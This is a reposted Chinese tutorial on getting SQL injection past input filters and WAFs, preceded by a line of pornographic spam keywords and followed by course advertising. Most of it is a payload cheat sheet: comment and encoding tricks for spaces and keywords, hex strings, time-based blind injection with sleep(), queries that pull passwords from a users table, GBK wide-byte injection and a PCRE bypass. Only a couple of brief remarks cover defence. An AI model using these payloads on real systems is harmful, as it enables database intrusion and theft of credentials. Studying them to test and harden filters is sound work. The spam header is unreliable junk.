国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Web安全之SQL注入繞過技巧

這篇具有很好參考價值的文章主要介紹了Web安全之SQL注入繞過技巧。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

1.繞過空格(注釋符/* */,%a0):

  兩個空格代替一個空格,用Tab代替空格,%a0=空格:

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/

??最基本的繞過方法,用注釋替換空格:

/*  注釋 */

sql注入過濾空格,數(shù)據(jù)庫,mysql,web安全,網(wǎng)絡安全,sqlserver

使用浮點數(shù):

select * from users where id=8E0union select 1,2,3
select * from users where id=8.0 select 1,2,3

2.括號繞過空格:

  如果空格被過濾,括號沒有被過濾,可以用括號繞過。

  在MySQL中,括號是用來包圍子查詢的。因此,任何可以計算出結(jié)果的語句,都可以用括號包圍起來。而括號的兩端,可以沒有多余的空格。

例如:

select(user())from dual where(1=1)and(2=2)

  這種過濾方法常常用于time based盲注,例如:

?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

(from for屬于逗號繞過下面會有)

  上面的方法既沒有逗號也沒有空格。猜解database()第一個字符ascii碼是否為109,若是則加載延時。

3.引號繞過(使用十六進制):

  會使用到引號的地方一般是在最后的where子句中。如下面的一條sql語句,這條語句就是一個簡單的用來查選得到users表中所有字段的一條語句:

select column_name  from information_schema.tables where table_name="users"

  這個時候如果引號被過濾了,那么上面的where子句就無法使用了。那么遇到這樣的問題就要使用十六進制來處理這個問題了。
  users的十六進制的字符串是7573657273。那么最后的sql語句就變?yōu)榱耍?/p>

select column_name  from information_schema.tables where table_name=0x7573657273

4.逗號繞過(使用from或者offset):

  在使用盲注的時候,需要使用到substr(),mid(),limit。這些子句方法都需要使用到逗號。對于substr()和mid()這兩個方法可以使用from to的方式來解決:

select substr(database() from 1 for 1);
select mid(database() from 1 for 1);

  使用join:

union select 1,2     #等價于
union select * from (select 1)a join (select 2)b

  使用like:

select ascii(mid(user(),1,1))=80   #等價于
select user() like 'r%'

  對于limit可以使用offset來繞過:

select * from news limit 0,1
# 等價于下面這條SQL語句
select * from news limit 1 offset 0

5.比較符號(<>)繞過(過濾了<>:sqlmap盲注經(jīng)常使用<>,使用between的腳本):

使用greatest()、least():(前者返回最大值,后者返回最小值)

  同樣是在使用盲注的時候,在使用二分查找的時候需要使用到比較操作符來進行查找。如果無法使用比較操作符,那么就需要使用到greatest來進行繞過了。
  最常見的一個盲注的sql語句:

select * from users where id=1 and ascii(substr(database(),0,1))>64

  此時如果比較操作符被過濾,上面的盲注語句則無法使用,那么就可以使用greatest來代替比較操作符了。greatest(n1,n2,n3,...)函數(shù)返回輸入?yún)?shù)(n1,n2,n3,...)的最大值。
  那么上面的這條sql語句可以使用greatest變?yōu)槿缦碌淖泳?

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

使用between and:

? ?between a and b:

between 1 and 1; 等價于 =1

6.or and xor not繞過:

and=&&  or=||   xor=|   not=!

7.繞過注釋符號(#,--(后面跟一個空格))過濾:

id=1' union select 1,2,3||'1

  最后的or '1閉合查詢語句的最后的單引號,或者:

id=1' union select 1,2,'3

8.=繞過:

  使用like 、rlike 、regexp 或者 使用< 或者 >

9.繞過union,select,where等:

(1)使用注釋符繞過:

  常用注釋符:

//,-- , /**/, #, --+, -- -, ;,%00,--a

  用法:

U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user

(2)使用大小寫繞過:

id=-1'UnIoN/**/SeLeCT

(3)內(nèi)聯(lián)注釋繞過:

id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#

(4) 雙關(guān)鍵字繞過(若刪除掉第一個匹配的union就能繞過):

id=-1'UNIunionONSeLselectECT1,2,3–-

10.通用繞過(編碼):

  如URLEncode編碼,ASCII,HEX,unicode編碼繞過:

or 1=1即%6f%72%20%31%3d%31,而Test也可以為CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

11.等價函數(shù)繞過:

hex()、bin() ==> ascii()

sleep() ==>benchmark()

concat_ws()==>group_concat()

mid()、substr() ==> substring()

@@user ==> user()

@@datadir ==> datadir()

舉例:substring()和substr()無法使用時:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 

或者:
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1

12.寬字節(jié)注入:

  過濾 ' 的時候往往利用的思路是將 ' 轉(zhuǎn)換為 \' 。

  在 mysql 中使用 GBK 編碼的時候,會認為兩個字符為一個漢字,一般有兩種思路:

  (1)%df 吃掉 \ 具體的方法是 urlencode('\) = %5c%27,我們在 %5c%27 前面添加 %df ,形成?%df%5c%27 ,而 mysql 在 GBK 編碼方式的時候會將兩個字節(jié)當做一個漢字,%df%5c 就是一個漢字,%27 作為一個單獨的(')符號在外面:

id=-1%df%27union select 1,user(),3--+

 ?。?)將 \' 中的 \ 過濾掉,例如可以構(gòu)造 %**%5c%5c%27 ,后面的?%5c 會被前面的?%5c 注釋掉。

一般產(chǎn)生寬字節(jié)注入的PHP函數(shù):

? ?1.replace():過濾 ' \ ,將 ' 轉(zhuǎn)化為 \' ,將 \ ?轉(zhuǎn)為 \\,將 " 轉(zhuǎn)為 \" 。用思路一。

? ?2.addslaches():返回在預定義字符之前添加反斜杠(\)的字符串。預定義字符:' , " , \ 。用思路一

(防御此漏洞,要將 mysql_query 設(shè)置為 binary 的方式)

   3.mysql_real_escape_string():轉(zhuǎn)義下列字符:

\x00     \n     \r     \     '     "     \x1a

(防御,將mysql設(shè)置為gbk即可)

PCRE繞過:

union/*'+'a'*1000001+'*/select

?文章來源地址http://www.zghlxwxcb.cn/news/detail-728717.html

web安全零基礎(chǔ)入門

1.web安全學習路線

對于從來沒有接觸過網(wǎng)絡安全的同學,我們幫你準備了詳細的學習成長路線圖??梢哉f是最科學最系統(tǒng)的學習路線,大家跟著這個大的方向?qū)W習準沒問題。

sql注入過濾空格,數(shù)據(jù)庫,mysql,web安全,網(wǎng)絡安全,sqlserver

?

同時每個成長路線對應的板塊都有配套的視頻提供:

sql注入過濾空格,數(shù)據(jù)庫,mysql,web安全,網(wǎng)絡安全,sqlserver

?

因篇幅有限,僅展示部分資料,需要的小伙伴可以給我點點關(guān)注~

2.視頻教程

很多朋友都不喜歡晦澀的文字,我也為大家準備了視頻教程,其中一共有21個章節(jié),每個章節(jié)都是當前板塊的精華濃縮。

sql注入過濾空格,數(shù)據(jù)庫,mysql,web安全,網(wǎng)絡安全,sqlserver

?

3.SRC漏洞挖掘&護網(wǎng)行動資料

其中關(guān)于SRC漏洞挖掘和HW護網(wǎng)行動,也準備了對應的資料,這些內(nèi)容可相當于比賽的金手指!

sql注入過濾空格,數(shù)據(jù)庫,mysql,web安全,網(wǎng)絡安全,sqlserver

?

4.網(wǎng)絡安全工具包合集

sql注入過濾空格,數(shù)據(jù)庫,mysql,web安全,網(wǎng)絡安全,sqlserver

?

到了這里,關(guān)于Web安全之SQL注入繞過技巧的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務器費用

相關(guān)文章

  • 從SQL注入繞過最新安全狗WAF中學習fuzz

    從SQL注入繞過最新安全狗WAF中學習fuzz

    SQL注入并不是很精通,通過實戰(zhàn)繞過WAF來進行加強SQL注入能力,希望對正在學習的師傅能有一絲幫助。 我是本地搭建的環(huán)境進行測試的 環(huán)境是 windows11+phpstudy2018+sqli-labs phpstudy的安裝我不再復述,這里簡單說一下安全狗插件和安全狗的安裝。 在安裝安全狗之前,一定要先做好

    2024年02月14日
    瀏覽(23)
  • 【W(wǎng)EB安全】SQL注入挖掘

    【W(wǎng)EB安全】SQL注入挖掘

    2021年OWASP發(fā)布漏洞威脅榜單,SQL注入從第一名下降到第三(https://owasp.org/Top10/),SQL注入是一種常見的Web攻擊技術(shù),通過構(gòu)造惡意的SQL語句來破壞數(shù)據(jù)庫安全。攻擊者可以通過提交帶有惡意代碼的輸入,例如網(wǎng)頁表單,來控制數(shù)據(jù)庫執(zhí)行惡意語句。這樣,攻擊者可以訪問敏感

    2024年02月13日
    瀏覽(30)
  • 《Web安全基礎(chǔ)》03. SQL 注入

    《Web安全基礎(chǔ)》03. SQL 注入

    本系列側(cè)重方法論,各工具只是實現(xiàn)目標的載體。 命令與工具只做簡單介紹,其使用另見《安全工具錄》。 靶場使用 SQLi-Labs。詳情參見《WriteUp:SQLi-Labs》 SQL 注入非常復雜,區(qū)分各種數(shù)據(jù)庫類型,提交方法,數(shù)據(jù)類型等注入。此類漏洞是 WEB 安全中嚴重的漏洞,學習如何利

    2024年02月14日
    瀏覽(21)
  • Web安全-初識SQL注入(一)

    Web安全-初識SQL注入(一)

    將不受信任的數(shù)據(jù)作為命令或查詢的一部分發(fā)送到解析器時,會產(chǎn)生諸如SQL注入、NoSQL注入、OS 注入和LDAP注入的注入缺陷。攻擊者的惡意數(shù)據(jù)可以誘使解析器在沒有適當授權(quán)的情況下執(zhí)行非預期命令或訪問數(shù)據(jù)。 注入能導致數(shù)據(jù)丟失、 破壞或泄露給無授權(quán)方,缺乏可審計性

    2024年02月05日
    瀏覽(19)
  • Web安全:SQL注入漏洞測試.

    Web安全:SQL注入漏洞測試.

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內(nèi)容 中,同時程序的本身對用戶輸入的內(nèi)容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務端執(zhí)行 ,導致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風險。 SQL注

    2024年02月05日
    瀏覽(25)
  • 【網(wǎng)絡安全---sql注入(2)】如何通過SQL注入getshell?如何通過SQL注入讀取文件或者數(shù)據(jù)庫數(shù)據(jù)?一篇文章告訴你過程和原理。

    【網(wǎng)絡安全---sql注入(2)】如何通過SQL注入getshell?如何通過SQL注入讀取文件或者數(shù)據(jù)庫數(shù)據(jù)?一篇文章告訴你過程和原理。

    分享一個非常詳細的網(wǎng)絡安全筆記,是我學習網(wǎng)安過程中用心寫的,可以點開以下鏈接獲取: 超詳細的網(wǎng)絡安全筆記 本篇博客主要是通過piakchu靶場來講解如何通過SQL注入漏洞來寫入文件,讀取文件。通過SQL輸入來注入木馬來getshell等,講解了比較詳細的過程; 如果想要學習

    2024年02月07日
    瀏覽(27)
  • Web安全-SQL注入常用函數(shù)(二)

    Web安全-SQL注入常用函數(shù)(二)

    ★★實戰(zhàn)前置聲明★★ 文章中涉及的程序(方法)可能帶有攻擊性,僅供安全研究與學習之用,讀者將其信息做其他用途,由用戶承擔全部法律及連帶責任,文章作者不承擔任何法律及連帶責任。 初始化安裝MySQL數(shù)據(jù)庫后(基于MySQL版本5.7.x),默認會創(chuàng)建4個系統(tǒng)數(shù)據(jù)庫: 以下內(nèi)

    2024年01月19日
    瀏覽(25)
  • web安全漏洞-SQL注入攻擊實驗

    web安全漏洞-SQL注入攻擊實驗

    實驗目的 學習sql顯注的漏洞判斷原理 掌握sqlmap工具的使用 分析SQL注入漏洞的成因 實驗工具 sqlmap是用python寫的開源的測試框架,支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,F(xiàn)irebird,Sybase,SAP,MAXDB并支持6種SQL注入手段。 實驗內(nèi)容 SQL注入(SQL I

    2024年02月06日
    瀏覽(28)
  • 加強Web應用程序安全:防止SQL注入

    加強Web應用程序安全:防止SQL注入

    數(shù)據(jù)庫在Web應用程序中存儲和組織數(shù)據(jù)時起著至關(guān)重要的作用,它是存儲用戶信息、內(nèi)容和其他應用程序數(shù)據(jù)的中央存儲庫。而數(shù)據(jù)庫實現(xiàn)了高效的數(shù)據(jù)檢索、操作和管理,使Web應用程序能夠向用戶提供動態(tài)和個性化的內(nèi)容。然而,數(shù)據(jù)庫和網(wǎng)絡應用程序之間的通信不暢可能

    2024年02月14日
    瀏覽(24)
  • 確保你的數(shù)據(jù)庫安全:如何防止SQL注入攻擊

    最近,越來越多的組織和公司受到SQL注入攻擊的困擾。這種攻擊可以導致數(shù)據(jù)庫中的敏感信息泄露,破壞數(shù)據(jù)完整性,甚至可能導致整個系統(tǒng)崩潰。如果您是一名數(shù)據(jù)庫管理員或網(wǎng)站管理員,您需要了解如何保護您的數(shù)據(jù)庫免受SQL注入攻擊的威脅。在本文中,小德將介紹什么

    2024年02月02日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包